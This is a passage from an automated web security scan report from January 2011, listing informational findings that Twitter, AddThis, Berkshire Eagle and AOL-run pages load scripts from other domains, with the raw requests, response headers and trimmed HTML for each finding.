Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.564. http://twitter.com/webandy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/webandy

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:39 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224919-86126-59712
ETag: "072bd7c69249b014a8eea541d0e13ce7"
Last-Modified: Fri, 28 Jan 2011 14:28:39 GMT
X-Runtime: 0.46070
Content-Type: text/html; charset=utf-8
Content-Length: 51273
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIh9odHRwOi8vdHdpdHRlci5jb20vd2ViYW5keToM%250AY3NyZl9pZCIlMzU4ODlhZDFhNTVmNjY2ODliNTc5MzYzYjlkMzVmNjc6B2lk%250AIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzon%250AQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7%250AADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--69ca8ae41a9f970b1732fe7d2a927b6f2859758a; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.565. http://twitter.com/webandy/status/30434889127960577 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/webandy/status/30434889127960577

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /webandy/status/30434889127960577 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:05 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225124-19468-58576
ETag: "fa107757d702f63b6b092df02a673af4"
Last-Modified: Fri, 28 Jan 2011 14:32:04 GMT
X-Runtime: 0.04063
Content-Type: text/html; charset=utf-8
Content-Length: 13641
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjhodHRwOi8vdHdpdHRlci5jb20vd2ViYW5keS9z%250AdGF0dXMvMzA0MzQ4ODkxMjc5NjA1Nzc6DGNzcmZfaWQiJThmNTA4MzQ5NzM2%250AYTQwNjAyZDM4ZjgxZTZkZGRjMmMzOg9jcmVhdGVkX2F0bCsIM07wzC0BOgdp%250AZCIlMWM5NTM0ODFhNDJmZGU5YzBjNzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2Vk%250AewA%253D--521844e3318e79765270d6b108a654c1ec5e7ef1; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.566. http://twitter.com/webandy/status/30434889127960577 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/webandy/status/30434889127960577

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /webandy/status/30434889127960577 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:08:52 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234532-86422-2970
ETag: "aa9592f78ce2ff0143c1fdeee3dfe44b"
Last-Modified: Fri, 28 Jan 2011 17:08:52 GMT
X-Runtime: 0.05563
Content-Type: text/html; charset=utf-8
Content-Length: 13509
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjhodHRwOi8vdHdpdHRlci5jb20vd2ViYW5keS9z%250AdGF0dXMvMzA0MzQ4ODkxMjc5NjA1Nzc6FWluX25ld191c2VyX2Zsb3cwOgxj%250Ac3JmX2lkIiVhYmM0NTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoMdHpf%250AbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBj%250ANzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZs%250AYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDM%250ALQE%253D--3087182e2f48f1582b6c3a9258006b035e2375c0; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.567. http://twitter.com/webandy/status/30434889127960577 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/webandy/status/30434889127960577

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /webandy/status/30434889127960577 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224919-88479-17443
ETag: "57ec15d6db2e642f3190ad41e31c8dd6"
Last-Modified: Fri, 28 Jan 2011 14:28:40 GMT
X-Runtime: 0.03905
Content-Type: text/html; charset=utf-8
Content-Length: 13641
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjhodHRwOi8vdHdpdHRlci5jb20vd2ViYW5keS9z%250AdGF0dXMvMzA0MzQ4ODkxMjc5NjA1Nzc6DGNzcmZfaWQiJTI5OWQ2NTRkM2U2%250AN2EyOGYyMDE5ZGJhNjA0YjRhZmM2OgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBj%250ANzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZs%250AYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDM%250ALQE%253D--84b9c2aee944901e5bd61754af202b278a459d82; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.568. http://twitter.com/zonajones previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/zonajones

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296261955
http://a0.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261955
http://a1.twimg.com/a/1296258363/javascripts/dismissable.js?1296261955
http://a1.twimg.com/a/1296258363/javascripts/twitter.js?1296261955
http://a2.twimg.com/a/1296258363/javascripts/geov1.js?1296261955
http://a3.twimg.com/a/1296258363/javascripts/api.js?1296261955
http://a3.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296261955
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:57 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265977-81164-11891
ETag: "18ef6945dbad6fc926ced7c8559a729e"
Last-Modified: Sat, 29 Jan 2011 01:52:57 GMT
X-Runtime: 0.01559
Content-Type: text/html; charset=utf-8
Content-Length: 47763
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/twitter.js?1296261955" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296261955" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296261955" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261955" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/geov1.js?1296261955" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/api.js?1296261955" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261955" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/dismissable.js?1296261955" type="text/javascript"></script>
...[SNIP]...

18.569. http://www.addthis.com/bookmark.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The response dynamically includes the following script from another domain:

http://cache.addthiscdn.com/www/q0197/js/bookmark.js

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.570. http://www.berkshireeagle.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.berkshireeagle.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://berkshireeagle.mycapture.com/datafeeds/14187.js
http://cm.npc-medianews.overture.com/partner/js/ypn.js
http://e.yieldmanager.net/script.js
http://edge.quantserve.com/quant.js
http://extras.mnginteractive.com/live/js/mngiMenu/mngiMenu.js
http://extras.mnginteractive.com/live/js/mngiads/AdsInclude.js
http://extras.mnginteractive.com/live/js/omniture/OmniUserObjAndHelper.js
http://extras.mnginteractive.com/live/js/omniture/SiteCatalystCode_H_17.js
http://extras.mnginteractive.com/live/js/omniture/functions.js
http://extras.mnginteractive.com/live/js/otherinc/com_tabs.js
http://extras.mnginteractive.com/live/js/otherinc/pop-window.js
http://extras.mnginteractive.com/live/js/weather/custom_weather_access.js
http://hosted.ap.org/lineups/NEWSBRIEF-bulleted.js?SITE=MAPIT&SECTIO
N=
HOME
http://img.video.ap.org/p/j/apovn.js
http://js.zvents.com/javascripts/zvents_mini.js

Request

GET / HTTP/1.1
Host: www.berkshireeagle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Sat, 29 Jan 2011 02:03:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 02:03:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=RTFIABV0BZYUKCUUCAWCFEY; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 106428

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Home'><meta name="keywords" content="Berkshire Eagle headlines"/><title>Home - Berkshire Ea
...[SNIP]...
</script><script language="JavaScript" type="text/javascript" src="http://extras.mnginteractive.com/live/js/mngiads/AdsInclude.js"></script><script language="JavaScript" type="text/javascript" src="http://extras.mnginteractive.com/live/js/otherinc/pop-window.js"></script>
...[SNIP]...
</script><script type="text/javascript" language="JavaScript" src="http://e.yieldmanager.net/script.js"></script>
...[SNIP]...
</script><script type="text/javascript" language="JavaScript" src='http://extras.mnginteractive.com/live/js/omniture/SiteCatalystCode_H_17.js'></script><script type="text/javascript" language="JavaScript" src='http://extras.mnginteractive.com/live/js/omniture/OmniUserObjAndHelper.js'></script>
...[SNIP]...
</script><script type="text/javascript" language="JavaScript" src='http://extras.mnginteractive.com/live/js/omniture/functions.js'></script>
...[SNIP]...
<script src="http://extras.mnginteractive.com/live/js/weather/custom_weather_access.js"></script>
<script type="text/javascript" src="http://extras.mnginteractive.com/live/js/mngiMenu/mngiMenu.js">
</script>
...[SNIP]...


<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<p><script type="text/javascript" src="http://img.video.ap.org/p/j/apovn.js "></script>
...[SNIP]...
</h2>
<script language="JavaScript" src="http://berkshireeagle.mycapture.com/datafeeds/14187.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.zvents.com/javascripts/zvents_mini.js"></script>
...[SNIP]...
</script>
<script language="JavaScript"
src="http://hosted.ap.org/lineups/NEWSBRIEF-bulleted.js?SITE=MAPIT&SECTIO
N=
HOME"></script>
...[SNIP]...
<?xml version="1.0" encoding="UTF-8"?><script xmlns:mngi="http://www.medianewsgroup.com" type="text/javascript" src="http://extras.mnginteractive.com/live/js/otherinc/com_tabs.js">/**/</script>
...[SNIP]...
</script><script type="text/javascript" src="http://cm.npc-medianews.overture.com/partner/js/ypn.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blackvoices.com
Path:	/$\|http:/latino.aol.com/$\|.ivillage.com.*/1\|www.ivillage.com/(celeb-news\|entertainment-photos\|tv\|for-kids\|video\|entertainment\|movies\|food\|recipes\|table-talk\|food-for-kids\|food-advice\|food-news\|food-video

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.channel.aol.com/_media/channels/ad_refresher.js
http://js.adsonar.com/js/adsonar.js
http://o.aolcdn.com/ads/adsWrapper.js
http://o.aolcdn.com/art/merge/?f=/_media/channels/common.js&f=/_media/channels/us.bv/bv.js&f=/_media/aolvideo30/mp.js&f=/_media/channels/us.news20/news20.js&f=/onlineopinions3ts/oo_engine.js&ver=1e&expsec=31536000&expsec=864000
http://o.aolcdn.com/art/webwidgets/sfsw_v1_1/feeds_subscribe.js
http://o.aolcdn.com/feedback/feedback1.js
http://o.aolcdn.com/journals_js/journals_blog_this.js
http://o.aolcdn.com/omniunih.js
http://www.aolcdn.com/_media/ke_tools/mmx_refresh_patch.js

Request

GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3244834828.1127760205.2705065472; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Fri, 28 Jan 2011 15:05:58 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31059
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</title>

<script language="javascript" type="text/javascript" src="http://o.aolcdn.com/journals_js/journals_blog_this.js"></script>
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
p://o.aolcdn.com/art/merge/?f=/_media/channels/common.css&f=/_media/channels/us.bv/bv.css&f=/_media/ch_css/bv_redesign-r18g.css&f=/_media/ch_bv/bv_comments.css&ver=1b&expsec=31536000&expsec=864000" />
<script type="text/javascript" src="http://o.aolcdn.com/art/merge/?f=/_media/channels/common.js&f=/_media/channels/us.bv/bv.js&f=/_media/aolvideo30/mp.js&f=/_media/channels/us.news20/news20.js&f=/onlineopinions3ts/oo_engine.js&ver=1e&expsec=31536000&expsec=864000"></script>
...[SNIP]...

<script src="http://o.aolcdn.com/art/webwidgets/sfsw_v1_1/feeds_subscribe.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://o.aolcdn.com/feedback/feedback1.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...
</div>

<script src="http://cdn.channel.aol.com/_media/channels/ad_refresher.js" type="text/javascript" language="javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<div class="text">
